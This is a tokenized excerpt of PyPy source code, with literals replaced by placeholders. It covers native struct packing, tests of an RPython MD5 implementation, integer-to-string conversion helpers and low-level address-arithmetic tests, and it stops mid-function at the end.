<s> """<STR_LIT>""" <EOL> import struct <EOL> from pypy . rlib . rstruct import standardfmttable as std <EOL> from pypy . rlib . rstruct . error import StructError <EOL> from pypy . rpython . tool import rffi_platform <EOL> from pypy . rpython . lltypesystem import lltype , rffi <EOL> from pypy . rlib . rarithmetic import r_singlefloat <EOL> from pypy . translator . tool . cbuild import ExternalCompilationInfo <EOL> from pypy . rlib . objectmodel import specialize <EOL> native_is_bigendian = struct . pack ( "<STR_LIT>" , <NUM_LIT:1> ) == struct . pack ( "<STR_LIT>" , <NUM_LIT:1> ) <EOL> native_fmttable = { <EOL> '<STR_LIT:x>' : std . standard_fmttable [ '<STR_LIT:x>' ] , <EOL> '<STR_LIT:c>' : std . standard_fmttable [ '<STR_LIT:c>' ] , <EOL> '<STR_LIT:s>' : std . standard_fmttable [ '<STR_LIT:s>' ] , <EOL> '<STR_LIT:p>' : std . standard_fmttable [ '<STR_LIT:p>' ] , <EOL> } <EOL> double_buf = lltype . malloc ( rffi . DOUBLEP . TO , <NUM_LIT:1> , flavor = '<STR_LIT>' , immortal = True ) <EOL> float_buf = lltype . malloc ( rffi . FLOATP . TO , <NUM_LIT:1> , flavor = '<STR_LIT>' , immortal = True ) <EOL> def pack_double ( fmtiter ) : <EOL> doubleval = fmtiter . accept_float_arg ( ) <EOL> double_buf [ <NUM_LIT:0> ] = doubleval <EOL> p = rffi . cast ( rffi . CCHARP , double_buf ) <EOL> for i in range ( sizeof_double ) : <EOL> fmtiter . result . append ( p [ i ] ) <EOL> @ specialize . argtype ( <NUM_LIT:0> ) <EOL> def unpack_double ( fmtiter ) : <EOL> input = fmtiter . read ( sizeof_double ) <EOL> p = rffi . cast ( rffi . CCHARP , double_buf ) <EOL> for i in range ( sizeof_double ) : <EOL> p [ i ] = input [ i ] <EOL> doubleval = double_buf [ <NUM_LIT:0> ] <EOL> fmtiter . appendobj ( doubleval ) <EOL> def pack_float ( fmtiter ) : <EOL> doubleval = fmtiter . accept_float_arg ( ) <EOL> floatval = r_singlefloat ( doubleval ) <EOL> float_buf [ <NUM_LIT:0> ] = floatval <EOL> p = rffi . cast ( rffi . CCHARP , float_buf ) <EOL> for i in range ( sizeof_float ) : <EOL> fmtiter . 
result . append ( p [ i ] ) <EOL> @ specialize . argtype ( <NUM_LIT:0> ) <EOL> def unpack_float ( fmtiter ) : <EOL> input = fmtiter . read ( sizeof_float ) <EOL> p = rffi . cast ( rffi . CCHARP , float_buf ) <EOL> for i in range ( sizeof_float ) : <EOL> p [ i ] = input [ i ] <EOL> floatval = float_buf [ <NUM_LIT:0> ] <EOL> doubleval = float ( floatval ) <EOL> fmtiter . appendobj ( doubleval ) <EOL> def setup ( ) : <EOL> INSPECT = { '<STR_LIT:b>' : '<STR_LIT>' , <EOL> '<STR_LIT:h>' : '<STR_LIT>' , <EOL> '<STR_LIT:i>' : '<STR_LIT>' , <EOL> '<STR_LIT:l>' : '<STR_LIT>' , <EOL> '<STR_LIT:q>' : '<STR_LIT>' , <EOL> '<STR_LIT:B>' : '<STR_LIT>' , <EOL> '<STR_LIT:H>' : '<STR_LIT>' , <EOL> '<STR_LIT:I>' : '<STR_LIT>' , <EOL> '<STR_LIT:L>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:P>' : '<STR_LIT>' , <EOL> '<STR_LIT:f>' : '<STR_LIT:float>' , <EOL> '<STR_LIT:d>' : '<STR_LIT>' , <EOL> } <EOL> pre_include_bits = [ ] <EOL> for fmtchar , ctype in INSPECT . items ( ) : <EOL> pre_include_bits . append ( """<STR_LIT>""" % ( fmtchar , ctype ) ) <EOL> class CConfig : <EOL> _compilation_info_ = ExternalCompilationInfo ( <EOL> pre_include_bits = pre_include_bits <EOL> ) <EOL> for fmtchar , ctype in INSPECT . items ( ) : <EOL> setattr ( CConfig , fmtchar , rffi_platform . Struct ( <EOL> "<STR_LIT>" % ( fmtchar , ) , <EOL> [ ( '<STR_LIT>' , lltype . FixedSizeArray ( rffi . CHAR , <NUM_LIT:1> ) ) ] ) ) <EOL> cConfig = rffi_platform . configure ( CConfig ) <EOL> for fmtchar , ctype in INSPECT . items ( ) : <EOL> S = cConfig [ fmtchar ] <EOL> alignment = rffi . offsetof ( S , '<STR_LIT>' ) <EOL> size = rffi . sizeof ( S . c_field ) <EOL> signed = '<STR_LIT:a>' <= fmtchar <= '<STR_LIT:z>' <EOL> if fmtchar == '<STR_LIT:f>' : <EOL> pack = pack_float <EOL> unpack = unpack_float <EOL> elif fmtchar == '<STR_LIT:d>' : <EOL> pack = pack_double <EOL> unpack = unpack_double <EOL> else : <EOL> cpython_checks_range = fmtchar in '<STR_LIT>' <EOL> pack = std . 
make_int_packer ( size , signed , cpython_checks_range ) <EOL> unpack = std . make_int_unpacker ( size , signed ) <EOL> native_fmttable [ fmtchar ] = { '<STR_LIT:size>' : size , <EOL> '<STR_LIT>' : alignment , <EOL> '<STR_LIT>' : pack , <EOL> '<STR_LIT>' : unpack } <EOL> setup ( ) <EOL> sizeof_double = native_fmttable [ '<STR_LIT:d>' ] [ '<STR_LIT:size>' ] <EOL> sizeof_float = native_fmttable [ '<STR_LIT:f>' ] [ '<STR_LIT:size>' ] <EOL> from pypy . rlib . rstruct import unichar <EOL> def pack_unichar ( fmtiter ) : <EOL> unistr = fmtiter . accept_unicode_arg ( ) <EOL> if len ( unistr ) != <NUM_LIT:1> : <EOL> raise StructError ( "<STR_LIT>" ) <EOL> c = unistr [ <NUM_LIT:0> ] <EOL> unichar . pack_unichar ( c , fmtiter . result ) <EOL> @ specialize . argtype ( <NUM_LIT:0> ) <EOL> def unpack_unichar ( fmtiter ) : <EOL> data = fmtiter . read ( unichar . UNICODE_SIZE ) <EOL> fmtiter . appendobj ( unichar . unpack_unichar ( data ) ) <EOL> native_fmttable [ '<STR_LIT:u>' ] = { '<STR_LIT:size>' : unichar . UNICODE_SIZE , <EOL> '<STR_LIT>' : unichar . UNICODE_SIZE , <EOL> '<STR_LIT>' : pack_unichar , <EOL> '<STR_LIT>' : unpack_unichar , <EOL> } </s>
<s> import md5 <EOL> from pypy . rlib import rmd5 <EOL> def test_digest_size ( ) : <EOL> assert rmd5 . digest_size == <NUM_LIT:16> <EOL> def test_cases ( ) : <EOL> """<STR_LIT>""" <EOL> cases = ( <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT:a>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT:abc>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" * <NUM_LIT:8> , <EOL> "<STR_LIT>" ) , <EOL> ) <EOL> for input , expected in cases : <EOL> d = rmd5 . RMD5 ( ) <EOL> d . update ( input ) <EOL> assert d . hexdigest ( ) == expected <EOL> assert d . digest ( ) == expected . decode ( '<STR_LIT>' ) <EOL> def test_more ( ) : <EOL> "<STR_LIT>" <EOL> cases = ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) <EOL> for input in cases : <EOL> d = rmd5 . RMD5 ( input ) <EOL> assert d . hexdigest ( ) == md5 . md5 ( input ) . hexdigest ( ) <EOL> assert d . digest ( ) == md5 . md5 ( input ) . digest ( ) <EOL> def test_long ( ) : <EOL> "<STR_LIT>" <EOL> cases = ( <EOL> <NUM_LIT:2> ** <NUM_LIT:10> * '<STR_LIT:a>' , <EOL> <NUM_LIT:2> ** <NUM_LIT:10> * '<STR_LIT>' , <EOL> ) <EOL> for input in cases : <EOL> d = rmd5 . RMD5 ( input ) <EOL> assert d . hexdigest ( ) == md5 . md5 ( input ) . hexdigest ( ) <EOL> assert d . digest ( ) == md5 . md5 ( input ) . digest ( ) <EOL> def test_updating_many_times ( ) : <EOL> "<STR_LIT>" <EOL> d1 = rmd5 . RMD5 ( ) <EOL> d2 = md5 . md5 ( ) <EOL> for i in range ( <NUM_LIT> ) : <EOL> d1 . update ( chr ( i & <NUM_LIT> ) ) <EOL> d2 . 
update ( chr ( i & <NUM_LIT> ) ) <EOL> assert d1 . digest ( ) == d2 . digest ( ) <EOL> def test_copy ( ) : <EOL> "<STR_LIT>" <EOL> cases = ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) <EOL> prefix1 = <NUM_LIT:2> ** <NUM_LIT:10> * '<STR_LIT:a>' <EOL> m1 = md5 . md5 ( ) <EOL> m1 . update ( prefix1 ) <EOL> m2 = rmd5 . RMD5 ( ) <EOL> m2 . update ( prefix1 ) <EOL> for message in cases : <EOL> m1c = m1 . copy ( ) <EOL> m1c . update ( message ) <EOL> d1 = m1c . hexdigest ( ) <EOL> m2c = m2 . copy ( ) <EOL> m2c . update ( message ) <EOL> d2 = m2c . hexdigest ( ) <EOL> assert d1 == d2 <EOL> def test_random ( ) : <EOL> import random , md5 <EOL> for i in range ( <NUM_LIT:20> ) : <EOL> input = '<STR_LIT>' . join ( [ chr ( random . randrange ( <NUM_LIT> ) ) <EOL> for i in range ( random . randrange ( <NUM_LIT:1000> ) ) ] ) <EOL> m1 = rmd5 . RMD5 ( ) <EOL> m1 . update ( input ) <EOL> m2 = md5 . new ( ) <EOL> m2 . update ( input ) <EOL> assert m2 . hexdigest ( ) == m1 . hexdigest ( ) </s>
<s> from pypy . rpython . lltypesystem . lltype import GcArray , Array , Char , malloc <EOL> from pypy . rpython . annlowlevel import llstr <EOL> from pypy . rlib . rarithmetic import r_uint , formatd <EOL> CHAR_ARRAY = GcArray ( Char ) <EOL> def ll_int_str ( repr , i ) : <EOL> return ll_int2dec ( i ) <EOL> ll_int_str . _pure_function_ = True <EOL> def ll_int2dec ( i ) : <EOL> from pypy . rpython . lltypesystem . rstr import mallocstr <EOL> temp = malloc ( CHAR_ARRAY , <NUM_LIT:20> ) <EOL> len = <NUM_LIT:0> <EOL> sign = <NUM_LIT:0> <EOL> if i < <NUM_LIT:0> : <EOL> sign = <NUM_LIT:1> <EOL> i = r_uint ( - i ) <EOL> else : <EOL> i = r_uint ( i ) <EOL> if i == <NUM_LIT:0> : <EOL> len = <NUM_LIT:1> <EOL> temp [ <NUM_LIT:0> ] = '<STR_LIT:0>' <EOL> else : <EOL> while i : <EOL> temp [ len ] = chr ( i % <NUM_LIT:10> + ord ( '<STR_LIT:0>' ) ) <EOL> i //= <NUM_LIT:10> <EOL> len += <NUM_LIT:1> <EOL> len += sign <EOL> result = mallocstr ( len ) <EOL> result . hash = <NUM_LIT:0> <EOL> if sign : <EOL> result . chars [ <NUM_LIT:0> ] = '<STR_LIT:->' <EOL> j = <NUM_LIT:1> <EOL> else : <EOL> j = <NUM_LIT:0> <EOL> while j < len : <EOL> result . chars [ j ] = temp [ len - j - <NUM_LIT:1> ] <EOL> j += <NUM_LIT:1> <EOL> return result <EOL> ll_int2dec . _pure_function_ = True <EOL> hex_chars = malloc ( Array ( Char ) , <NUM_LIT:16> , immortal = True ) <EOL> for i in range ( <NUM_LIT:16> ) : <EOL> hex_chars [ i ] = "<STR_LIT>" % i <EOL> def ll_int2hex ( i , addPrefix ) : <EOL> from pypy . rpython . lltypesystem . 
rstr import mallocstr <EOL> temp = malloc ( CHAR_ARRAY , <NUM_LIT:20> ) <EOL> len = <NUM_LIT:0> <EOL> sign = <NUM_LIT:0> <EOL> if i < <NUM_LIT:0> : <EOL> sign = <NUM_LIT:1> <EOL> i = r_uint ( - i ) <EOL> else : <EOL> i = r_uint ( i ) <EOL> if i == <NUM_LIT:0> : <EOL> len = <NUM_LIT:1> <EOL> temp [ <NUM_LIT:0> ] = '<STR_LIT:0>' <EOL> else : <EOL> while i : <EOL> temp [ len ] = hex_chars [ i & <NUM_LIT> ] <EOL> i >>= <NUM_LIT:4> <EOL> len += <NUM_LIT:1> <EOL> len += sign <EOL> if addPrefix : <EOL> len += <NUM_LIT:2> <EOL> result = mallocstr ( len ) <EOL> result . hash = <NUM_LIT:0> <EOL> j = <NUM_LIT:0> <EOL> if sign : <EOL> result . chars [ <NUM_LIT:0> ] = '<STR_LIT:->' <EOL> j = <NUM_LIT:1> <EOL> if addPrefix : <EOL> result . chars [ j ] = '<STR_LIT:0>' <EOL> result . chars [ j + <NUM_LIT:1> ] = '<STR_LIT:x>' <EOL> j += <NUM_LIT:2> <EOL> while j < len : <EOL> result . chars [ j ] = temp [ len - j - <NUM_LIT:1> ] <EOL> j += <NUM_LIT:1> <EOL> return result <EOL> ll_int2hex . _pure_function_ = True <EOL> def ll_int2oct ( i , addPrefix ) : <EOL> from pypy . rpython . lltypesystem . rstr import mallocstr <EOL> if i == <NUM_LIT:0> : <EOL> result = mallocstr ( <NUM_LIT:1> ) <EOL> result . hash = <NUM_LIT:0> <EOL> result . chars [ <NUM_LIT:0> ] = '<STR_LIT:0>' <EOL> return result <EOL> temp = malloc ( CHAR_ARRAY , <NUM_LIT> ) <EOL> len = <NUM_LIT:0> <EOL> sign = <NUM_LIT:0> <EOL> if i < <NUM_LIT:0> : <EOL> sign = <NUM_LIT:1> <EOL> i = r_uint ( - i ) <EOL> else : <EOL> i = r_uint ( i ) <EOL> while i : <EOL> temp [ len ] = hex_chars [ i & <NUM_LIT> ] <EOL> i >>= <NUM_LIT:3> <EOL> len += <NUM_LIT:1> <EOL> len += sign <EOL> if addPrefix : <EOL> len += <NUM_LIT:1> <EOL> result = mallocstr ( len ) <EOL> result . hash = <NUM_LIT:0> <EOL> j = <NUM_LIT:0> <EOL> if sign : <EOL> result . chars [ <NUM_LIT:0> ] = '<STR_LIT:->' <EOL> j = <NUM_LIT:1> <EOL> if addPrefix : <EOL> result . chars [ j ] = '<STR_LIT:0>' <EOL> j += <NUM_LIT:1> <EOL> while j < len : <EOL> result . 
chars [ j ] = temp [ len - j - <NUM_LIT:1> ] <EOL> j += <NUM_LIT:1> <EOL> return result <EOL> ll_int2oct . _pure_function_ = True <EOL> def ll_float_str ( repr , f ) : <EOL> return llstr ( formatd ( "<STR_LIT>" , f ) ) <EOL> ll_float_str . _pure_function_ = True </s>
<s> from pypy . rpython . lltypesystem . llmemory import * <EOL> from pypy . rpython . lltypesystem import lltype <EOL> from pypy . rpython . test . test_llinterp import interpret <EOL> import py <EOL> def test_simple ( ) : <EOL> S = lltype . GcStruct ( "<STR_LIT:S>" , ( "<STR_LIT:x>" , lltype . Signed ) , ( "<STR_LIT:y>" , lltype . Signed ) ) <EOL> s = lltype . malloc ( S ) <EOL> s . x = <NUM_LIT> <EOL> s . y = <NUM_LIT> <EOL> a = fakeaddress ( s ) <EOL> assert a . ref ( ) == s <EOL> b = a + FieldOffset ( S , '<STR_LIT:x>' ) <EOL> assert b . signed [ <NUM_LIT:0> ] == <NUM_LIT> <EOL> b . signed [ <NUM_LIT:0> ] = <NUM_LIT> <EOL> assert s . x == <NUM_LIT> <EOL> def test_simple_float ( ) : <EOL> S = lltype . GcStruct ( "<STR_LIT:S>" , ( "<STR_LIT:x>" , lltype . Float ) , ( "<STR_LIT:y>" , lltype . Float ) ) <EOL> s = lltype . malloc ( S ) <EOL> s . x = <NUM_LIT> <EOL> s . y = <NUM_LIT> <EOL> a = fakeaddress ( s ) <EOL> assert a . ref ( ) == s <EOL> b = a + FieldOffset ( S , '<STR_LIT:x>' ) <EOL> assert b . float [ <NUM_LIT:0> ] == <NUM_LIT> <EOL> b . float [ <NUM_LIT:0> ] = <NUM_LIT> <EOL> assert s . x == <NUM_LIT> <EOL> def test_composite ( ) : <EOL> S1 = lltype . GcStruct ( "<STR_LIT>" , ( "<STR_LIT:x>" , lltype . Signed ) , ( "<STR_LIT:y>" , lltype . Signed ) ) <EOL> S2 = lltype . GcStruct ( "<STR_LIT>" , ( "<STR_LIT:s>" , S1 ) ) <EOL> s2 = lltype . malloc ( S2 ) <EOL> s2 . s . x = <NUM_LIT> <EOL> s2 . s . y = <NUM_LIT> <EOL> a = fakeaddress ( s2 ) <EOL> assert a . ref ( ) == s2 <EOL> b = a + FieldOffset ( S2 , '<STR_LIT:s>' ) + FieldOffset ( S1 , '<STR_LIT:x>' ) <EOL> assert b . signed [ <NUM_LIT:0> ] == <NUM_LIT> <EOL> b . signed [ <NUM_LIT:0> ] = <NUM_LIT> <EOL> assert s2 . s . x == <NUM_LIT> <EOL> def test_array ( ) : <EOL> A = lltype . GcArray ( lltype . Signed ) <EOL> x = lltype . malloc ( A , <NUM_LIT:5> ) <EOL> x [ <NUM_LIT:3> ] = <NUM_LIT> <EOL> a = fakeaddress ( x ) <EOL> b = a + ArrayItemsOffset ( A ) <EOL> b += ItemOffset ( lltype . 
Signed ) * <NUM_LIT:2> <EOL> b += ItemOffset ( lltype . Signed ) <EOL> assert b . signed [ <NUM_LIT:0> ] == <NUM_LIT> <EOL> b . signed [ <NUM_LIT:0> ] = <NUM_LIT> <EOL> assert x [ <NUM_LIT:3> ] == <NUM_LIT> <EOL> def test_array_endaddress ( ) : <EOL> A = lltype . GcArray ( lltype . Signed ) <EOL> x = lltype . malloc ( A , <NUM_LIT:5> ) <EOL> x [ <NUM_LIT:4> ] = <NUM_LIT> <EOL> a = fakeaddress ( x ) <EOL> b = a + ArrayItemsOffset ( A ) <EOL> b += ItemOffset ( lltype . Signed ) * <NUM_LIT:5> <EOL> assert b == a + ArrayItemsOffset ( A ) + ItemOffset ( lltype . Signed ) * <NUM_LIT:5> <EOL> py . test . raises ( IndexError , "<STR_LIT>" ) <EOL> b -= ItemOffset ( lltype . Signed ) <EOL> assert b . signed [ <NUM_LIT:0> ] == <NUM_LIT> <EOL> def test_structarray_endaddress ( ) : <EOL> S = lltype . Struct ( '<STR_LIT:S>' , ( '<STR_LIT:foo>' , lltype . Signed ) ) <EOL> A = lltype . GcArray ( S ) <EOL> x = lltype . malloc ( A , <NUM_LIT:5> ) <EOL> x [ <NUM_LIT:4> ] . foo = <NUM_LIT> <EOL> a = fakeaddress ( x ) <EOL> b = a + ArrayItemsOffset ( A ) <EOL> b += ItemOffset ( S ) * <NUM_LIT:5> <EOL> assert b == a + ArrayItemsOffset ( A ) + ItemOffset ( S ) * <NUM_LIT:5> <EOL> p = cast_adr_to_ptr ( b , lltype . Ptr ( S ) ) <EOL> py . test . raises ( AttributeError , "<STR_LIT>" ) <EOL> py . test . raises ( AttributeError , "<STR_LIT>" ) <EOL> b -= ItemOffset ( S ) <EOL> p = cast_adr_to_ptr ( b , lltype . Ptr ( S ) ) <EOL> assert p . foo == <NUM_LIT> <EOL> def test_dont_mix_offsets_and_ints ( ) : <EOL> o = AddressOffset ( ) <EOL> py . test . raises ( TypeError , "<STR_LIT>" ) <EOL> py . test . raises ( TypeError , "<STR_LIT>" ) <EOL> def test_sizeof ( ) : <EOL> array = lltype . Array ( lltype . Signed ) <EOL> struct = lltype . Struct ( "<STR_LIT:S>" , ( '<STR_LIT:x>' , lltype . Signed ) ) <EOL> varstruct = lltype . Struct ( "<STR_LIT:S>" , ( '<STR_LIT:x>' , lltype . Signed ) , ( '<STR_LIT:y>' , array ) ) <EOL> sizeof ( struct ) <EOL> sizeof ( lltype . Signed ) <EOL> py . test . 
raises ( AssertionError , "<STR_LIT>" ) <EOL> py . test . raises ( AssertionError , "<STR_LIT>" ) <EOL> sizeof ( array , <NUM_LIT:1> ) <EOL> sizeof ( varstruct , <NUM_LIT:2> ) <EOL> def test_confusion_with_fixedarray_item_0 ( ) : <EOL> A = lltype . FixedSizeArray ( lltype . Signed , <NUM_LIT:5> ) <EOL> B = lltype . FixedSizeArray ( A , <NUM_LIT:3> ) <EOL> myoffset = itemoffsetof ( A , <NUM_LIT:4> ) <EOL> global_b = lltype . malloc ( B , immortal = True ) <EOL> global_b [ <NUM_LIT:0> ] [ <NUM_LIT:4> ] = <NUM_LIT:1000> <EOL> global_b [ <NUM_LIT:1> ] [ <NUM_LIT:4> ] = <NUM_LIT> <EOL> global_b [ <NUM_LIT:2> ] [ <NUM_LIT:4> ] = <NUM_LIT> <EOL> def f ( n ) : <EOL> a = global_b [ n ] <EOL> adr_a = cast_ptr_to_adr ( a ) <EOL> return ( adr_a + myoffset ) . signed [ <NUM_LIT:0> ] <EOL> assert f ( <NUM_LIT:2> ) == <NUM_LIT> <EOL> assert f ( <NUM_LIT:1> ) == <NUM_LIT> <EOL> assert f ( <NUM_LIT:0> ) == <NUM_LIT:1000> <EOL> res = interpret ( f , [ <NUM_LIT:0> ] ) <EOL> assert res == <NUM_LIT:1000> <EOL> def test_structarray_add ( ) : <EOL> S = lltype . Struct ( "<STR_LIT:S>" , ( "<STR_LIT:x>" , lltype . Signed ) ) <EOL> for a in [ lltype . malloc ( lltype . GcArray ( S ) , <NUM_LIT:5> ) , <EOL> lltype . malloc ( lltype . FixedSizeArray ( S , <NUM_LIT:5> ) , immortal = True ) ] : <EOL> a [ <NUM_LIT:3> ] . x = <NUM_LIT> <EOL> adr_s = cast_ptr_to_adr ( a ) <EOL> adr_s += itemoffsetof ( lltype . typeOf ( a ) . TO , <NUM_LIT:0> ) <EOL> adr_s += sizeof ( S ) * <NUM_LIT:3> <EOL> s = cast_adr_to_ptr ( adr_s , lltype . Ptr ( S ) ) <EOL> assert s . x == <NUM_LIT> <EOL> def test_fakeaddress_equality ( ) : <EOL> S = lltype . GcStruct ( '<STR_LIT:S>' , ( '<STR_LIT:x>' , lltype . Signed ) ) <EOL> T = lltype . GcStruct ( '<STR_LIT:T>' , ( '<STR_LIT:y>' , lltype . Signed ) ) <EOL> s1 = lltype . malloc ( S ) <EOL> s1 . x = <NUM_LIT:1> <EOL> s2 = lltype . malloc ( S ) <EOL> s2 . x = <NUM_LIT:1> <EOL> t = lltype . malloc ( T ) <EOL> t . 
y = <NUM_LIT:1> <EOL> a1s1 , a2s1 , as2 , at = map ( cast_ptr_to_adr , [ s1 , s1 , s2 , t ] ) <EOL> assert a1s1 == a2s1 <EOL> assert a1s1 != as2 <EOL> assert a1s1 != at <EOL> assert as2 != at <EOL> def test_more_fakeaddress_equality ( ) : <EOL> S = lltype . GcStruct ( '<STR_LIT:S>' , ( '<STR_LIT:x>' , lltype . Signed ) ) <EOL> T = lltype . GcStruct ( '<STR_LIT:T>' , ( '<STR_LIT:s>' , S ) ) <EOL> t = lltype . malloc ( T ) <EOL> t . s . x = <NUM_LIT:1> <EOL> s = lltype . cast_pointer ( lltype . Ptr ( S ) , t ) <EOL> a_t , a_s = map ( cast_ptr_to_adr , [ s , t ] ) <EOL> assert a_t == a_s <EOL> def test_fakeaccessor ( ) : <EOL> S = lltype . GcStruct ( "<STR_LIT:S>" , ( "<STR_LIT:x>" , lltype . Signed ) , ( "<STR_LIT:y>" , lltype . Signed ) ) <EOL> s = lltype . malloc ( S ) <EOL> s . x = <NUM_LIT> <EOL> s . y = <NUM_LIT> <EOL> adr = cast_ptr_to_adr ( s ) <EOL> adr += FieldOffset ( S , "<STR_LIT:y>" ) <EOL> assert adr . signed [ <NUM_LIT:0> ] == <NUM_LIT> <EOL> adr . signed [ <NUM_LIT:0> ] = <NUM_LIT> <EOL> assert s . y == <NUM_LIT> <EOL> A = lltype . GcArray ( lltype . Signed ) <EOL> a = lltype . malloc ( A , <NUM_LIT:5> ) <EOL> a [ <NUM_LIT:3> ] = <NUM_LIT> <EOL> adr = cast_ptr_to_adr ( a ) <EOL> assert ( adr + ArrayLengthOffset ( A ) ) . signed [ <NUM_LIT:0> ] == <NUM_LIT:5> <EOL> assert ( adr + ArrayItemsOffset ( A ) ) . signed [ <NUM_LIT:3> ] == <NUM_LIT> <EOL> ( adr + ArrayItemsOffset ( A ) ) . signed [ <NUM_LIT:3> ] = <NUM_LIT> <EOL> assert a [ <NUM_LIT:3> ] == <NUM_LIT> <EOL> adr1000 = ( adr + ArrayItemsOffset ( A ) + ItemOffset ( lltype . Signed , <NUM_LIT:1000> ) ) <EOL> assert adr1000 . signed [ - <NUM_LIT> ] == <NUM_LIT> <EOL> A = lltype . GcArray ( lltype . Char ) <EOL> a = lltype . malloc ( A , <NUM_LIT:5> ) <EOL> a [ <NUM_LIT:3> ] = '<STR_LIT:*>' <EOL> adr = cast_ptr_to_adr ( a ) <EOL> assert ( adr + ArrayLengthOffset ( A ) ) . signed [ <NUM_LIT:0> ] == <NUM_LIT:5> <EOL> assert ( adr + ArrayItemsOffset ( A ) ) . 
char [ <NUM_LIT:3> ] == '<STR_LIT:*>' <EOL> ( adr + ArrayItemsOffset ( A ) ) . char [ <NUM_LIT:3> ] = '<STR_LIT:+>' <EOL> assert a [ <NUM_LIT:3> ] == '<STR_LIT:+>' <EOL> adr1000 = ( adr + ArrayItemsOffset ( A ) + ItemOffset ( lltype . Char , <NUM_LIT:1000> ) ) <EOL> assert adr1000 . char [ - <NUM_LIT> ] == '<STR_LIT:+>' <EOL> T = lltype . FixedSizeArray ( lltype . Char , <NUM_LIT:10> ) <EOL> S = lltype . GcStruct ( '<STR_LIT:S>' , ( '<STR_LIT:z>' , lltype . Ptr ( T ) ) ) <EOL> s = lltype . malloc ( S ) <EOL> s . z = lltype . malloc ( T , immortal = True ) <EOL> adr = cast_ptr_to_adr ( s ) <EOL> assert ( adr + offsetof ( S , '<STR_LIT:z>' ) ) . address [ <NUM_LIT:0> ] == cast_ptr_to_adr ( s . z ) <EOL> ( adr + offsetof ( S , '<STR_LIT:z>' ) ) . address [ <NUM_LIT:0> ] = NULL <EOL> assert s . z == lltype . nullptr ( T ) <EOL> t = lltype . malloc ( T , immortal = True ) <EOL> ( adr + offsetof ( S , '<STR_LIT:z>' ) ) . address [ <NUM_LIT:0> ] = cast_ptr_to_adr ( t ) <EOL> assert s . z == t <EOL> def test_fakeadr_eq ( ) : <EOL> S = lltype . GcStruct ( "<STR_LIT:S>" , ( "<STR_LIT:x>" , lltype . Signed ) , ( "<STR_LIT:y>" , lltype . Signed ) ) <EOL> s = lltype . malloc ( S ) <EOL> assert cast_ptr_to_adr ( s ) == cast_ptr_to_adr ( s ) <EOL> adr1 = cast_ptr_to_adr ( s ) + FieldOffset ( S , "<STR_LIT:x>" ) <EOL> adr2 = cast_ptr_to_adr ( s ) + FieldOffset ( S , "<STR_LIT:y>" ) <EOL> adr3 = cast_ptr_to_adr ( s ) + FieldOffset ( S , "<STR_LIT:y>" ) <EOL> assert adr1 != adr2 <EOL> assert adr2 == adr3 <EOL> A = lltype . GcArray ( lltype . Char ) <EOL> a = lltype . malloc ( A , <NUM_LIT:5> ) <EOL> adr1 = cast_ptr_to_adr ( a ) + ArrayLengthOffset ( A ) <EOL> adr2 = cast_ptr_to_adr ( a ) + ArrayLengthOffset ( A ) <EOL> assert adr1 == adr2 <EOL> adr1 = cast_ptr_to_adr ( a ) + ArrayItemsOffset ( A ) <EOL> adr2 = cast_ptr_to_adr ( a ) + ArrayItemsOffset ( A ) <EOL> assert adr1 == adr2 <EOL> adr2 += ItemOffset ( lltype . 
Char , <NUM_LIT:0> ) <EOL> assert adr1 == adr2 <EOL> adr1 += ItemOffset ( lltype . Char , <NUM_LIT:2> ) <EOL> adr2 += ItemOffset ( lltype . Char , <NUM_LIT:3> ) <EOL> assert adr1 != adr2 <EOL> adr2 += ItemOffset ( lltype . Char , - <NUM_LIT:1> ) <EOL> assert adr1 == adr2 <EOL> def test_adr_sub ( ) : <EOL> assert NULL - NULL == <NUM_LIT:0> <EOL> A = lltype . GcArray ( lltype . Char ) <EOL> a = raw_malloc ( sizeof ( A , <NUM_LIT:5> ) ) <EOL> assert a - a == <NUM_LIT:0> <EOL> def test_cast_subarray_pointer ( ) : <EOL> for a in [ lltype . malloc ( lltype . GcArray ( lltype . Signed ) , <NUM_LIT:5> ) , <EOL> lltype . malloc ( lltype . FixedSizeArray ( lltype . Signed , <NUM_LIT:5> ) , <EOL> immortal = True ) ] : <EOL> A = lltype . typeOf ( a ) . TO <EOL> SUBARRAY = lltype . FixedSizeArray ( lltype . Signed , <NUM_LIT:1> ) <EOL> a [ <NUM_LIT:3> ] = <NUM_LIT> <EOL> adr = cast_ptr_to_adr ( a ) + itemoffsetof ( A , <NUM_LIT:3> ) <EOL> subarray = cast_adr_to_ptr ( adr , lltype . Ptr ( SUBARRAY ) ) <EOL> assert subarray [ <NUM_LIT:0> ] == <NUM_LIT> <EOL> subarray [ <NUM_LIT:0> ] += <NUM_LIT:2> <EOL> assert a [ <NUM_LIT:3> ] == <NUM_LIT> <EOL> def test_cast_structfield_pointer ( ) : <EOL> S = lltype . GcStruct ( '<STR_LIT:S>' , ( '<STR_LIT:x>' , lltype . Signed ) , ( 